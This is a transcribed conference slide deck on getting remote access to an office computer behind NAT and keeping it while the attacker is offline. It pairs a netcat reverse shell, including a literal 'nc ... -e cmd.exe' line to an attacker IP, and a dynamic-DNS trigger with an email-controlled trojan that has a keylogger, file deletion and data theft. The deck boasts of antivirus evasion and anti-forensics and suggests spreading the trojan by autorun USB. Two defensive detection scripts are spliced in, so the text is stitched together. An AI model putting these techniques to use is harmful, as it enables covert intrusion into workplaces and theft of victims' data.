Handle Exploitation of a Remote System Without Being Online (Merchant Bhaumik)

  1. Handle Exploitation of a Remote System Without Being Online!! By Merchant Bhaumik
  2. Who Am I? • Currently helping local law enforcement and helping to secure some government websites • Developer of the IND 360 Intrusion Detection System (host-based as well as network-based detection) • Communicating with the Metasploit guys to develop a term called "Universal Payload"
  3. Presentation Flow… • Reverse shell using Dynamic DNS concepts • Getting data from the victim computer using an email tool
  4. We will understand this mechanism by considering one scenario…
  5. Jack's Situation… Jack works in a company in which all computers are behind the NAT box, and he has just decided to break into one of the systems in his office and get a shell from the office to his home computer.
  6. Problems For Jack… • The company has a NIDS/IPS (network IDS), so no inbound connections • He doesn't know what IP address his ISP has allocated to him • He can't use any mechanism that constantly sends some outbound traffic
  7. Good Thing For Jack… • Jack's office allows him to access his Gmail account and allows some outbound traffic.
  8. I. #include <REVERSE SHELL>
  9. Why Reverse Shell? • A reverse shell is one of the powerful methods for bypassing network intrusion detection systems, firewalls (most of them), etc. • Because some of these network intrusion systems only monitor inbound connections, not outbound • Jack has a DMZ network in his office
  10. Diagram 1: the office DMZ, with internal hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123 and reaching the Internet; Jack's individual IP is 49.24.3.12.
  11. Diagram 2 (Normal Attack!): the same network, with 49.24.3.12 as the attacker IP and 117.254.4.123 as the office public IP. Step I: start a handler on port 4343: nc -l -p 4343. Step II (victim): nc 49.24.3.12 4343 -e cmd.exe
  12. Normal Flow Of Getting a Reverse Shell: Exploit! → Attacker starts handler → Vulnerability injection and all that → Victim sends reverse shell to attacker machine → Attacker wins!
  13. But What's Wrong With Jack? He doesn't know what IP address is allocated to his computer (dynamic IP allocation by ISPs).
  14. Solution… The attacker is "offline" but will still get the reverse shell.
  15. My Way… Exploit! → Attacker starts handler (starting the handler on the local attacker machine is optional!) → Vulnerability injection and all that → Victim sends reverse shell to attacker machine → Attacker wins!
  16. Flow Of Execution… Attacker → attack exe running in the victim machine → Did the attacker update the DNS records? No: the exe stays up and running in the remote machine even while the attacker is not online. Yes: the attacker receives the reverse shell; the reverse shell is on the attacker's desk!
  17. Mechanism • If the code (First Part) receives a positive acknowledgement of sending packets, Jack will get the reverse shell • Else it keeps running in the victim machine and waits for an ack from the attacker's machine
  18. Dynamic DNS Way… (Initially!) • First Part: catchme.dyndns-ip.com (255.255.255.255) • Second Part: payload.dyndns-ip.com (255.255.255.255) • The new final EXE (New.exe) consists of the First Part and the Second Part, executed synchronously in a single EXE
  19. Dynamic DNS Way… (Finally!) • First Part: catchme.dyndns-ip.com (127.0.0.1) • Second Part: payload.dyndns-ip.com (attacker's IP) • The new final EXE (New.exe) consists of the First Part and the Second Part, executed synchronously in a single EXE
  20. Metasploit…!!!!! • You can embed my method (or my exe) with the Metasploit payload of your choice. • The structure of the new exe will be as follows: the new final EXE (New.exe) consists of My Tool and an MSF payload (LHOST = dynamic), executed synchronously in a single EXE
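The two-part dynamic DNS arrangement above leaves a footprint a defender can look for: a host that keeps resolving a dynamic-DNS name which answers with a parked, non-routable address until the record is changed. The following is an added detection example, not code from the slides or from the author's tool; the resolver-log format, the client and name values and the sentinel set are constructed for the example.

```python
"""Added defensive example (not from the slide deck): report dyndns names a host
keeps resolving while they answer with a parked, non-routable address, and the
moment the answer changes. Constructed log line: <epoch> <client> <qname> <answer>"""
import ipaddress
from collections import defaultdict
# Non-routable answers a dormant implant can poll without reaching anything.
SENTINELS = {"255.255.255.255", "127.0.0.1", "0.0.0.0"}
# Constructed log: one workstation polls two names every 60 s; both change at once.
SAMPLE_LOG = """\
1700000000 192.168.1.4 catchme.dyndns-ip.com 255.255.255.255
1700000000 192.168.1.4 payload.dyndns-ip.com 255.255.255.255
1700000060 192.168.1.4 catchme.dyndns-ip.com 255.255.255.255
1700000060 192.168.1.4 payload.dyndns-ip.com 255.255.255.255
1700000120 192.168.1.4 catchme.dyndns-ip.com 127.0.0.1
1700000120 192.168.1.4 payload.dyndns-ip.com 49.24.3.12
1700000180 192.168.1.5 www.example.com 93.184.216.34
"""

def parse_log(text):
    """Yield (ts, client, qname, answer); malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 4:
            ts, client, qname, answer = parts
            yield int(ts), client, qname.lower().rstrip("."), answer

def is_routable(addr):
    """True when the answer is a globally routable address."""
    try:
        return ipaddress.ip_address(addr).is_global
    except ValueError:
        return False

def find_flipped_names(text):
    """One finding per (client, qname) that began on a sentinel and later changed."""
    history = defaultdict(list)
    for ts, client, qname, answer in parse_log(text):
        history[(client, qname)].append((ts, answer))
    findings = []
    for (client, qname), answers in sorted(history.items()):
        answers.sort()
        first = answers[0][1]
        if first not in SENTINELS:
            continue
        changed = [(ts, a) for ts, a in answers if a != first]
        if changed:
            ts, new = changed[0]
            findings.append({"client": client, "qname": qname, "flipped_at": ts,
                             "flipped_to": new, "routable": is_routable(new),
                             "sentinel_polls": sum(a == first for _, a in answers)})
    return findings
```

In the sample, the trigger name flips to 127.0.0.1 (still non-routable) while the payload name flips to a routable address; both are reported, so the same check covers the "go" signal and the handler address.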
  21. Hands-On Network: the same layout as Diagram 1, with internal hosts 192.168.1.1 to 192.168.1.5 behind the public IP 117.254.4.123 and the individual IP 49.24.3.12 across the Internet.
  22. Time To Enjoy Cooked Cookies And Recipes!!
  23. Demo
  24. II. #include <EMAIL TOOL>
  25. Normal Remote Trojans & Viruses! Attacker (must be online!), Victim (must be online!)
  26. My Tool!! Caution: no need to be online!! Attacker (may or may not be online!!), Victim (may or may not be online!!)
  27. So, How Does It Work?? Attacker, Zombie, Victim
  28. But, Who Is the Zombie?? It may be any one of the services whose logos are shown on the slide.
  29. Features!! Execute operating-system-level commands by using emails! Get all network card information with allocated IP addresses! Live tracking of the system being used by the victim! Get the list of all available accounts! Enable/disable key logger! All this stuff with Gmail, Yahoo, Hotmail…!!
  30. About It! It is a simple application which, once up and going on the victim's computer, the attacker can handle using the Gmail, Yahoo or Hotmail email services. There is no need for the attacker to be online to attack the victim system. The attacker has to send attack instructions to any of the mail services, and then it is like sitting at the door and watching for the event, "when it's gonna open!!" As the victim connects to the internet, the attack launches and the results are automatically sent back to the attacker's email address.
  31. Cool Benefits!! If the email account is accessed through one of the services pictured on the slide, then it is totally anti-forensic! No reverse detection is possible! Create a unique password for each individual infected victim. Ability to handle multiple clients simultaneously. Delete files on the victim's computer by simply sending an email. No antivirus can detect the attack because of HTTPS.
  32. Tool Syntax… Password_For_Victim ":" Task_Commands ":" E.g. Pwd$98$ : Account_info : where "Pwd$98$" is the password for the particular victim and Account_info is the command that sends back the email containing the account info from the victim computer!
  33. Snap Shot 1… (Load Attack Instructions): password for the individual victim; send account info of the victim; send drive info of the victim; send MAC and network card info.
  34. Snap Shot 2… (Get Back Attack Result): the attached info of the victim's computer, as per the attacker's choice, in my email account!
  35. Why Gmail??
  36. No Fear Of Detection 1: no direct connection between attacker and victim.
  37. No Fear Of Detection 2: no virus detection due to HTTPS… no digital signatures!! Ability to self-destruct!
  38. How To Spread This Code?? Autorun.inf by USB drives… Physical access to the victim's system… During Metasploit exploitation…
  39. Further Possible Development!! This code is flexible enough to be developed further by my hacker friends. It is also possible in future to send exploits or trojans by using this code. Anyone can send exploits, trojans, rootkits, backdoors by simply attaching them to an email and sending it to his own account or the account that is configured in the victim's code.
  40. Pros N Cons 1! (Be Transparent!!) Advantages are that the attacker is never going to get caught if he/she uses something like TOR, Anonymizer, VPNs or any proxy for accessing the attacking Gmail account. No antivirus can detect the instruction data because all the traffic is going to come over HTTPS! Only a single Gmail account is going to be used for both sides: the attacker and the victim machine both connect to the same account, but the attacker knows and the victim doesn't!!
  41. Pros N Cons 2. Disadvantage is that, if the victim has the habit of checking the current connections using commands like 'netstat -n', then it is possible to detect the Gmail connection when there is actually no browser activity. But still it is difficult to detect, because the process is running in hidden mode.
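Slide 41's own observation, that netstat shows a connection to the mail service while no browser is open, can be automated so that it does not depend on the victim's habits: take the connection table together with the PID-to-process mapping and flag any established HTTPS or mail-port session whose owner is not a known browser or mail client. The following is an added defensive example, not part of the deck or the author's tool; the netstat and tasklist output is constructed, and the allowlist of images and the set of watched ports are assumptions to adjust per host.

```python
"""Added defensive example (not from the slide deck): list established HTTPS or
mail-port connections whose owning process is not a known browser or mail
client. Inputs are constructed `netstat -ano` and `tasklist /fo csv` output."""
import csv
import io

# Assumption: ports an email-driven implant would talk to (HTTPS plus mail).
WATCHED_PORTS = {443, 465, 587, 993, 995}
# Assumption: images that legitimately hold such connections on this host.
ALLOWED_IMAGES = {"chrome.exe", "firefox.exe", "msedge.exe", "iexplore.exe",
                  "outlook.exe", "thunderbird.exe"}

# Constructed `netstat -ano` output: two HTTPS sessions, only one from a browser.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.1.4:49712      203.0.113.10:443       ESTABLISHED     2212
  TCP    192.168.1.4:49720      203.0.113.11:443       ESTABLISHED     4880
  TCP    192.168.1.4:49733      203.0.113.12:80        TIME_WAIT       0
  UDP    0.0.0.0:5353           *:*                                    1304
"""
# Constructed `tasklist /fo csv` output giving the PID -> image mapping.
SAMPLE_TASKLIST = """\
"Image Name","PID","Session Name","Session#","Mem Usage"
"chrome.exe","2212","Console","1","210,112 K"
"update.exe","4880","Console","1","3,400 K"
"""

def parse_netstat(text):
    """Yield (local, remote_host, remote_port, state, pid) for TCP rows only."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            _, local, remote, state, pid = parts
            host, _, port = remote.rpartition(":")   # also copes with [v6]:port
            yield local, host, int(port), state, int(pid)

def parse_tasklist(text):
    """Map PID -> lower-cased image name from the CSV tasklist output."""
    return {int(row["PID"]): row["Image Name"].lower()
            for row in csv.DictReader(io.StringIO(text))}

def suspicious_connections(netstat_text, tasklist_text):
    """Established connections to WATCHED_PORTS not owned by an allowed image."""
    owners = parse_tasklist(tasklist_text)
    hits = []
    for local, host, port, state, pid in parse_netstat(netstat_text):
        if state == "ESTABLISHED" and port in WATCHED_PORTS:
            image = owners.get(pid, "<unknown pid>")
            if image not in ALLOWED_IMAGES:
                hits.append({"pid": pid, "image": image, "remote": f"{host}:{port}"})
    return hits
```

A hidden process does not show up in the task bar, but it still owns a socket, so the PID column is what ties the connection back to it.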
  42. Hands-On Time..! (Demo)
  43. For More… backdoor.security@gmail.com
  44. Thanks Guys For Checking It Out…!
